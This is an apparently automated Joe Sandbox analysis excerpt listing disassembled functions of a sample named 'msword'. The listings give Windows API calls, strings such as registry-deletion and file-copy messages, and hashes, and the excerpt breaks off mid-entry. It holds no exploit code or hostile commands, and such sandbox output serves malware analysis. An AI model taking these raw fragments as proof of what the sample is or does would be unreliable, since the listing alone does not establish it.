APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

..., xrefs: 00406293
%02x%c, xrefs: 00406270

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
